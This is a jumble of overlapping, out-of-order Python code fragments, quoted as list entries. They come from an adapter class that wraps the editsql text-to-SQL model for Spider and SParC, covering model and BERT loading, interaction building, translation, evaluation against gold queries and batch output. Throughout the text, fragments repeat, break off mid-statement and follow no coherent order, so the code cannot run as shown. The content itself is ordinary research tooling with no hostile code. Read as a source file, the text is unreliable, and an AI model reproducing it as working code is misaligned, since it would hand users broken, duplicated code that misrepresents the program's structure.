The use_gold_query switch enables comparison with the gold queries from spider", "examples from the file amount = len(references) # determine the instances to test", "output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size", "\"\"\" Creates an InteractionItem that contains the natural language question and the database", "= self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema)", "dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] =", "db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the", "context prev_predictions: the previous predictions Returns: an InteractionItem that contains the natural language", "load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import", "params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem", "pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return", "# transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction", "context prev_nl_questions: the previous questions or an empty list prev_predictions: the previous predictions", "'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if 
params.bert_type_abb ==", "translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) #", "schema) # normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\"", "= create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings,", "prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language", "language question and the database id Args: nl_questions: the natural language questions db_id:", "output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original", "editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let", "list of dicts with values for nl_question and db_id output_dir: path of dir", "that acts as context prev_nl_questions: the previous questions or an empty list prev_predictions:", "if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create", "prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id,", "\".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction =", "= nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" # transform the raw interaction", "database that acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions", "prediction results of 
standalone editsql \"\"\" # load the prediction results of standalone", "define a modified embeddings loading function that makes use of the preloaded glove", "== 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False", "no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available()", "translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance", "interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self,", "do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained", "acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question]", "translations to a file in the output directory Args: input_file: path of file", "dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy id\"", "SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and", "bert_config # overwrite the original function with the modified version utils_bert.get_bert = get_bert", "= end - start time_per_item = duration / amount num_correct = amount -", "contains the natural language question and the database id \"\"\" # establish the", "the file amount = len(references) # determine the instances to test on if", "else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing -----------------", 
"map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS':", "\"\"\" Read the list of dicts with values for nl_question and db_id from", "nl_question: the natural language question db_id: the database that acts as context Returns:", "# preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction)", "the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if", "= \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id", "prediction results of standalone editsql act as the reference. The use_gold_query switch enables", "write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE,", "request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path", "= False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')", "if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original", "sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[])", "db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions,", "params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" 
model", "The use_gold_query switch enables comparison with the gold queries from spider Args: amount:", "enables comparison with the gold queries from spider Args: amount: the amount of", "= \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering from", "else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "= dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"]", "self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used", "c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in", "model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model def prepare_interaction(self,", "of the prediction results of standalone editsql \"\"\" # load the prediction results", "create the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _,", "42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for", "def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1]", "duration = end - start time_per_item = duration / amount num_correct = amount", "choose samples show_all: write all samples, not only those with errors use_gold_query: comparison", "predictions or an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions", "0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw =", "prev_nl_questions: the previous questions or an empty list prev_predictions: the previous 
predictions or", "comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {}", "eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------", "/ \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS':", "the list of dicts with values for nl_question and db_id from the input", "@classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values", "eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"%", "prev_predictions): \"\"\" Predict the sql for the next utterance in an interaction Args:", "natural language question and the database id Args: nl_questions: the natural language questions", "= edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename =", "= postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False,", "outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function that makes", "nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] =", "a single natural language question into sql Args: nl_question: the natural language question", "queries from spider instead of the prediction results of standalone editsql \"\"\" #", "request[\"sql\"] = 
edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename", "where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f:", "if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = []", "parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel(", "+= 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"]", "function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params):", "the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # -------", "params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return", "as context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction", "that acts as context Returns: the sql prediction \"\"\" # preprocess nl_questions =", "interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = []", "Args: params: the parsed arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\"", "CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR):", "function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version", "bert_config_file) print('vocab_file', vocab_file) 
print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case)", "ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import", "translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\":", "references = json.load(infile) if not amount: # let amount default to _all_ examples", "sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema =", "references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id)", "params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded", "_all_ examples from the file amount = len(references) # determine the instances to", "gold = postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results", "if c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit()", "model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device", "write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\"", "sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else:", "db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = 
postprocess_one(gold, schema) # normalize and prevent", "= gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end =", "params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False", "into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args()", "glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings #", "dicts with values for nl_question and db_id from the input file and save", "sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors =", "glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings", "not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] =", "= dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end -", "example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] =", "= \"query to be predicted\" # transform the raw interaction to an InteractionItem", "from adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class", "return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question", "the prediction results of standalone editsql \"\"\" # load the prediction results of", "comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration =", "with values for 
nl_question and db_id from the input file and save the", "= num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"] =", "filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading", "indent=4) # define a modified embeddings loading function that makes use of the", "False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin')", "data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model", "postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling", "else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration", "= amount - num_errors accuracy = num_correct * 100 / amount eval_output =", "i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory):", "= time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile,", "predicted\" # transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example)", "in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"]", "SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) 
model.load_state_dict(torch.load(params.save_file,map_location='cpu'))", "all samples, not only those with errors use_gold_query: comparison with the gold queries", "\"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end", "\".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define", "ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema,", "acts as context prev_predictions: the previous predictions Returns: an InteractionItem that contains the", "with open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"]", "database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params:", "= Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as", "Path import numpy as np import json import torch from editsql.data_util import atis_batch", "------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size", "first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12',", "'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or", "device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config #", "model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = 
parse_args_spider.interpret_args() #", "sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] =", "''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error =", "use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if", "use_gold_query switch enables comparison with the gold queries from spider Args: amount: the", "# let amount default to _all_ examples from the file amount = len(references)", "end - start time_per_item = duration / amount num_correct = amount - num_errors", "no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint =", "Creates an InteractionItem that contains the natural language question and the database id", "def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for", "= references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq,", "def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path", "accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR /", "# load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references", "sql Args: nl_question: the natural language question db_id: the database that acts as", "nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in", "and model data = ATISDataset(params) self.model = 
self.load_model(params, data) _, _, self.database_schemas =", "if use_gold_query: is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm", "pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str =", "for the next utterance in an interaction Args: nl_question: the natural language question", "self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction", "c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let amount default", "c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in", "the natural language question and the database id Args: nl_questions: the natural language", "= self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction):", "output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings", "preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction =", "BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12',", "BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import", "input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings 
= None if output_vocabulary_schema: output_vocabulary_schema_embeddings =", "map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type", "symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema =", "infile: references = json.load(infile) if not amount: # let amount default to _all_", "api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality", "self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) #", "time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] =", "references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw =", "= map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb ==", "_EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema", "'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or", "dicts with values for nl_question and db_id output_dir: path of dir where the", "glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token", "[nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def", "InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return 
interaction def translate(self, nl_question,", "data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model", "predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] #", "'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb ==", "\" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed =", "translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item = duration", "preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use", "\"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy", "post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate", "fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill", "comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq", "torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the", "create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings 
loading function", "from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from", "# fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"]", "output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with", "\".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"])", "= references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if", "the database id \"\"\" # establish the structure of an interaction in raw", "[] num_errors = 0 start = time.time() for i in sample_indices: db_id =", "import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary", "# define a modified embeddings loading function that makes use of the preloaded", "# strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self,", "- start time_per_item = duration / amount num_correct = amount - num_errors accuracy", "dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as", "vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint',", "== 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True", "# overwrite the original embeddings loading function with the modified version model.load_word_embeddings =", "import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import 
setup_util from api.paths", "map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return", "k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0 start =", "gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm =", "return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with", "tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else:", "if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] =", "the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute", "file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\"", "* from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses", "self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the", "def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16',", "or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining =", "loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified", "distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else 
c.lower() for c in", "num_correct = amount - num_errors accuracy = num_correct * 100 / amount eval_output", "= self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict", "those with errors use_gold_query: comparison with the gold queries from spider instead of", "previous predictions Returns: an InteractionItem that contains the natural language question and the", "amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default", "the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold)", "preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return", "num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"]", "modified version model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path", "\" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering from distorting", "the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction =", "return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema:", "not amount: # let amount default to _all_ examples from the file amount", "model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with the modified", "arguments data: the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params,", "= duration / amount num_correct = amount - num_errors 
